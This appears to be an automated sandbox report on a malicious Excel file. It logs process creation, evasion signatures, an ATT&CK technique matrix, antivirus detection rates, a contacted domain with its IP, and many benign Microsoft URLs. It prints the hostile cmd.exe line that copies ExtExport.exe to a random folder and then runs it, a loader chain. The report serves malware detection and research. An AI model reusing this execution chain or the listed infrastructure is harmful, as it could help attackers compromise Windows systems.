Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe 'C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe' C:\aZ8ThU0Y\ERdZMUem GdPT AuMr7
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe 'C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe' C:\aZ8ThU0Y\ERdZMUem GdPT AuMr7
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: extexport.pdbGCTL source: nnAzot.exe, 00000004.00000002.224789217.0000000000C01000.00000020.00020000.sdmp, nnAzot.exe.2.dr
Source: Binary string: extexport.pdb source: nnAzot.exe, nnAzot.exe.2.dr
Source: document-47-2637.xlsInitial sample: OLE indicators vbamacros = False
Source: document-47-2637.xlsInitial sample: OLE indicators encrypted = True
Source: nnAzot.exe.2.drStatic PE information: 0xA55DB0F5 [Fri Nov 30 21:19:49 2057 UTC]
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: 4_2_00C09865 push ecx; ret
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeJump to dropped file
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: 4_2_00C03367 LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: document-47-2637.xlsStream path 'Workbook' entropy: 7.97723236264 (max. 8.0)

Malware Analysis System Evasion:

barindex
Contains functionality to compare user and computer (likely to detect sandboxes)Show sources
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: GetModuleFileNameW,PathFindFileNameW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,StrStrIW,_wcsicmp,_wcsicmp,StrCmpICW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeAPI coverage: 6.9 %
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: 4_2_00C06EB1 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: 4_2_00C07684 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: 4_2_00C09380 SetUnhandledExceptionFilter,
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: 4_2_00C096D1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: 4_2_00C09583 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: 4_2_00C08F20 GetVersionExA,

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting2Application Shimming1Process Injection2Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsApplication Shimming1Disable or Modify Tools1LSASS MemorySecurity Software Discovery12Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Extra Window Memory Injection1Process Injection2Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting2NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information11LSA SecretsSystem Information Discovery4SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonTimestomp1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsExtra Window Memory Injection1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
document-47-2637.xls26%VirustotalBrowse
document-47-2637.xls23%MetadefenderBrowse
document-47-2637.xls15%ReversingLabsDocument-Office.Trojan.Heuristic

Dropped Files

SourceDetectionScannerLabelLink
C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe0%MetadefenderBrowse
C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
webhub365.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%VirustotalBrowse
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%VirustotalBrowse
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
webhub365.com
198.244.146.96
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
    high
    https://login.microsoftonline.com/6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
      high
      https://shell.suite.office.com:14436529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
          high
          https://autodiscover-s.outlook.com/6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
              high
              https://cdn.entity.6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkey6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                    high
                    https://powerlift.acompli.net6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v16529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                      high
                      https://cortana.ai6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                high
                                https://api.aadrm.com/6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                      high
                                      https://cr.office.com6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControl6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                          high
                                          https://graph.ppe.windows.net6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                            high
                                            https://res.getmicrosoftkey.com/api/redemptionevents6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://powerlift-frontdesk.acompli.net6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://tasks.office.com6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                              high
                                              https://officeci.azurewebsites.net/api/6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/work6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                high
                                                https://store.office.cn/addinstemplate6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                  high
                                                  https://globaldisco.crm.dynamics.com6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                    high
                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                      high
                                                      https://store.officeppe.com/addinstemplate6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://dev0-api.acompli.net/autodetect6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.odwebp.svc.ms6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://api.powerbi.com/v1.0/myorg/groups6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                        high
                                                        https://web.microsoftstream.com/video/6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                          high
                                                          https://graph.windows.net6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                            high
                                                            https://dataservice.o365filtering.com/6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://officesetup.getmicrosoftkey.com6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://analysis.windows.net/powerbi/api6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                              high
                                                              https://prod-global-autodetect.acompli.net/autodetect6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://outlook.office365.com/autodiscover/autodiscover.json6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                high
                                                                https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                  high
                                                                  https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                    high
                                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                      high
                                                                      https://ncus.contentsync.6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                        high
                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                          high
                                                                          http://weather.service.msn.com/data.aspx6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                            high
                                                                            https://apis.live.net/v5.0/6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                              high
                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                high
                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                  high
                                                                                  https://management.azure.com6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                    high
                                                                                    https://wus2.contentsync.6529B5B3-6D5E-4521-86C2-74637D63C046.0.drfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
